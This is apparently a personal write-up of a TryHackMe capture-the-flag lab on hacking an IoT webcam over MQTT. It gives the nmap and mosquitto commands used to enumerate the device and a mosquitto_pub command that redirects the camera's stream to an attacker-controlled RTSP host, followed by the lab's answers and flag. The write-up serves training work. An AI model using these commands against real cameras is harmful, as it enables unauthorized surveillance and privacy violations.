[Day 21] MQTT

December 21, 2022

Today is a great day for hacking as I am learning about IoT hacking! More specifically the IoT hacking is on webcam hacking, which is something I have been interested in for the past couple of weeks.

First, I launch the target machine and run a nmap scan against common webcam port 1883, which happens to have mosquitto version 1.6.9 running as a service. According to THM, I need to gain more device information by enumerating an ID, if I use nmap -p 1883 -sV -sC <IP> or mosquitto_sub -h <IP> -t device/init then I can find an ID 77OVW9OKDCY0DQRD6F49.

After some code analysis from the firmware on yesterday's topic, I create a JSON message that can be received by the webcam. I then launch a docker image that can watch the webcam with sudo docker run --rm -it --network=host aler9/rtsp-simple-server.

Once a docker-machine started running I sent this message to the IoT device so I could view the webcam from my computer. mosquitto_pub -h <target IP> -t device/77OVW9OKDCY0DQRD6F49/cmd -m """{"cmd":"10","url":"rtsp://<attacker IP>:8554/abc123"}"""

Finally, I ran vlc to view the webcam stream vlc rtsp://127.0.0.1:8554/abc123 and got the final flag!

Flags

What port is Mosquitto running on?

1883

Is the device/init topic enumerated by Nmap during a script scan of all ports? (y/n)

y

What Mosquitto version is the device using?

1.6.9

What flag is obtained from viewing the RTSP stream?

THM{UR_CAMERA_IS_MINE}